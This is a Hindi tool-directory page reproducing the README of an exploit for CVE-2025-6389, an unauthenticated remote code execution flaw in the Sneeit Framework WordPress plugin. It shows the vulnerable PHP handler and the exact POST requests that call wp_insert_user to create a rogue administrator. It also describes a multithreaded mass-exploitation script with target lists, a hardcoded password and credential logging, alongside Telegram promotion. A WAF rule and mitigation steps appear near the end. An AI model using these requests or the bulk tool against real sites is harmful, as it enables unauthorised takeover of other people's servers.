Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 - sneeit_articles_pagination_callback में बिना प्रमाणीकरण के रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-6389
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 - sneeit_articles_pagination_callback में बिना प्रमाणीकरण के रिमोट कोड निष्पादन

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-6389

Sneeit Framework <= 8.3 - अनधिकृत रिमोट कोड निष्पादन sneeit_articles_pagination_callback में

root@kitploit:~
    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python License


📡 अगली ड्रॉप को मिस न करें। Telegram पर @KNxploited को फॉलो करें — नए खुले CVE, काम करने वाले एक्सप्लॉइट और एलीट सुरक्षा अनुसंधान के लिए निश्चित चैनल। पहले जानें। पहले कार्रवाई करें।


🧠 अवलोकन

CVE-2025-6389 एक CVSS 9.8 क्रिटिकल रिमोट कोड निष्पादन भेद्यता है जो WordPress के लिए Sneeit Framework प्लगइन में पाई गई है।

यह दोष sneeit_articles_pagination_callback() फ़ंक्शन में मौजूद है, जो उपयोगकर्ता-आपूर्ति किए गए इनपुट को बिना जाँच के PHP के call_user_func() में पास करता है — एक अनधिकृत हमलावर किसी भी PHP फ़ंक्शन को मनमाने तर्कों के साथ कॉल कर सकता है, जिसमें wp_insert_user भी शामिल है, जो प्रभावी रूप से स्वयं को पूर्ण व्यवस्थापक पहुँच प्रदान करता है या कोई भी सर्वर-साइड कोड निष्पादित कर सकता है।


💀 भेद्यता गहराई से समझना

इसका मूल कारण प्लगइन के AJAX हैंडलर में PHP के call_user_func() का दुरुपयोग है:

root@kitploit:~
// प्रमाणीकरण जाँच के बिना पंजीकृत
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← उपयोगकर्ता-नियंत्रित फ़ंक्शन नाम
    $args     = json_decode(stripslashes($_POST['args']), true); // ← उपयोगकर्ता-नियंत्रित तर्क

    // किसी भी PHP फ़ंक्शन को किसी भी तर्क के साथ कॉल करना — शून्य मान्यता
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

यह क्यों क्रिटिकल है:

  • wp_ajax_nopriv_* = किसी के लिए भी सुलभ, लॉगिन आवश्यक नहीं
  • call_user_func($callback, $args) = मनमानी फ़ंक्शन आह्वान
  • हमलावर var_dump, system, wp_insert_user, eval, या कोई भी PHP/WordPress फ़ंक्शन कॉल कर सकता है
  • प्रतिक्रिया सीधे वापस की जाती है — ब्लाइंड और वर्बोज़ RCE सक्षम करना

⚔️ शोषण श्रृंखला

root@kitploit:~
चरण 1 — जाँच / फिंगरप्रिंट
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

अपेक्षित प्रतिक्रिया → array(1) { [0]=> string(4) "test" }
  ↓
पुष्टि करता है: call_user_func() पहुँच योग्य है और आउटपुट प्रतिबिंबित कर रहा है

──────────────────────────────────────────────────────────────────
चरण 2 — व्यवस्थापक खाता निर्माण
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

परिणाम → लक्ष्य पर चुपचाप नया व्यवस्थापक खाता बनाया गया
  ↓
पूर्ण WordPress व्यवस्थापक पैनल पहुँच प्राप्त ✔️

⚙️ आवश्यकताएँ

root@kitploit:~
pip install requests rich
निर्भरताउद्देश्य
requestsसत्र/प्रॉक्सी समर्थन के साथ HTTP अनुरोध
richलाइव टर्मिनल डैशबोर्ड, पैनल, प्रगति

Python 3.8+ आवश्यक है। टाइप हिंट tuple[...] सिंटैक्स का उपयोग करते हैं जो 3.9+ में शुरू हुआ — सर्वोत्तम अनुकूलता के लिए 3.9+ का उपयोग करें।


📂 फ़ाइल संरचना

root@kitploit:~
CVE-2025-6389/
├── CVE-2025-6389.py          # मुख्य शोषण स्क्रिप्ट
├── list.txt                  # लक्ष्य URL — प्रति पंक्ति एक
├── success_results.txt       # स्वतः उत्पन्न: सफल लक्ष्य + क्रेडेंशियल्स
└── debug_responses/          # स्वतः उत्पन्न: डिबगिंग के लिए कच्चे सर्वर प्रतिक्रियाएँ
    └── <target>.resp.txt

🚀 उपयोग

चरण 1 — लक्ष्य तैयार करें

list.txt बनाएं जिसमें प्रति पंक्ति एक URL हो:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

बिना http:// या https:// वाले URL स्वचालित रूप से http:// से उपसर्गित हो जाते हैं।


चरण 2 — शोषण चलाएँ

root@kitploit:~
python CVE-2025-6389.py

आपसे पूछा जाएगा:

root@kitploit:~
लक्ष्य फ़ाइल का नाम (डिफ़ॉल्ट list.txt): list.txt
थ्रेड्स की संख्या (डिफ़ॉल्ट 10):       20

चरण 3 — लाइव डैशबोर्ड

स्क्रिप्ट एक रीयल-टाइम Rich डैशबोर्ड लॉन्च करती है जो दिखाता है:

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  जानकारी                     │  आँकड़े                               │
│  उपयोग: लक्ष्य डालें...    │  कुल लक्ष्य:  150                 │
│  थ्रेड्स: 20                 │  प्रसंस्कृत:      87                  │
│  पासवर्ड: xplpass           │  सफलताएँ:      12                  │
│  सफलता लॉग: success...     │  विफलताएँ:       75                  │
│  डीबग डीआईआर: debug_responses  │  बीता समय:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  हाल के परिणाम                                                      │
│  समय     लक्ष्य                              परिणाम                 │
│  14:23:01 https://victim.com                  SUCCESS               │
│  14:23:03 https://example.net                 FAIL                  │
└─────────────────────────────────────────────────────────────────────┘

चरण 4 — परिणामों की समीक्षा करें

सफल शोषण success_results.txt में सहेजे जाते हैं:

root@kitploit:~
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]

डीबग प्रतिक्रियाएँ (विफल लक्ष्यों के लिए) debug_responses/ के अंतर्गत सहेजी जाती हैं:

root@kitploit:~
debug_responses/
└── https___victim.com.resp.txt   ← विश्लेषण के लिए कच्ची सर्वर प्रतिक्रिया

🖥️ स्क्रिप्ट पैरामीटर संदर्भ


📊 पहचान हस्ताक्षर

शोषण निम्नलिखित नेटवर्क हस्ताक्षर उत्पन्न करता है — रक्षकों और WAF नियम लेखकों के लिए उपयोगी:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=<FUNCTION>&args=<JSON>

WAF / IDS नियम (स्यूडोकोड):

root@kitploit:~
IF request.method == POST
AND request.path  == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "sneeit_articles_pagination"
AND request.body CONTAINS "callback"
THEN BLOCK + ALERT

🛡️ शमन और सुधार

यदि आप साइट स्वामी, डेवलपर या रक्षक हैं, तो इन कदमों को तुरंत उठाएँ:

  • ✅ अपडेट करें Sneeit Framework को 8.3 से ऊपर के संस्करण में यदि कोई पैच उपलब्ध है
  • ✅ निष्क्रिय करें और हटाएँ प्लगइन को जब तक पैच किए गए संस्करण की पुष्टि न हो जाए
  • ✅ ऑडिट करें हाल ही में बनाए गए WordPress व्यवस्थापक खातों की अनधिकृत प्रविष्टियों के लिए
  • ✅ लागू करें सर्वर-साइड इनपुट मान्यता — उपयोगकर्ता इनपुट को कभी भी call_user_func() में न पास करें
  • ✅ ब्लॉक करें WAF/फ़ायरवॉल स्तर पर admin-ajax.php के लिए अनधिकृत POST अनुरोध
  • ✅ निगरानी करें sneeit_articles_pagination AJAX एक्शन कॉल के लिए सर्वर लॉग्स
  • ✅ सक्षम करें सभी मौजूदा व्यवस्थापक खातों पर दो-कारक प्रमाणीकरण एक नियंत्रण उपाय के रूप में

⚠️ अस्वीकरण

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, running, or modifying this script, you explicitly agree:

  • You have EXPLICIT, WRITTEN authorization from the owner of every
    system you test. No exceptions.

  • You are operating within a controlled lab environment or during a
    formally scoped and authorized engagement.

  • You will NOT deploy this tool against any system, network, or
    infrastructure you do not have legal permission to test.

  • Nxploited and all contributors assume ZERO liability for any
    unauthorized use, damage, data loss, legal action, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit is a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — And all equivalent national and international cybercrime laws.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.

👤 लेखक

हैंडलNxploited (Khaled Alenazi)
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Telegram पर @KNxploited को फॉलो करें वह चैनल जहाँ वास्तविक एक्सप्लॉइट पहले ड्रॉप होते हैं — CVE, जीरो-डे, PoC, और गहन भेद्यता अनुसंधान। नियमित रूप से अपडेट किया जाता है। चौकस रहें।


Nxploited द्वारा सटीकता के साथ तैयार · केवल अधिकृत सुरक्षा अनुसंधान के लिए · CVSS 9.8 क्रिटिकल
टूल डाउनलोड करें
फ़ील्डविवरण
CVE IDCVE-2025-6389
प्लगइनSneeit Framework (sneeit-framework)
प्रभावित संस्करणसभी संस्करण 8.3 तक सहित
भेद्यता प्रकाररिमोट कोड निष्पादन (RCE)
हमला वेक्टरनेटवर्क — कोई प्रमाणीकरण आवश्यक नहीं
CVSS 3.1 स्कोर9.8 क्रिटिकल
CVSS वेक्टरAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
प्रभावपूर्ण सर्वर समझौता / व्यवस्थापक अधिग्रहण
शोधकर्ताNxploited
threadingएक साथ बहु-लक्ष्य प्रसंस्करण
queueथ्रेड-सुरक्षित लक्ष्य वितरण
प्रॉम्प्टडिफ़ॉल्टविवरण
लक्ष्य फ़ाइलlist.txtलक्ष्य URL वाली फ़ाइल
थ्रेड्स की संख्या10 (अधिकतम: 200)समवर्ती कार्यकर्ता — बल्क स्कैन के लिए बढ़ाएँ
पासवर्डxplpass (हार्डकोडेड)बनाए गए व्यवस्थापक खातों के लिए सेट पासवर्ड
उपयोगकर्ता नाम प्रारूपNxploited_XXXXयादृच्छिक 4-अंकीय प्रत्यय के साथ स्वतः उत्पन्न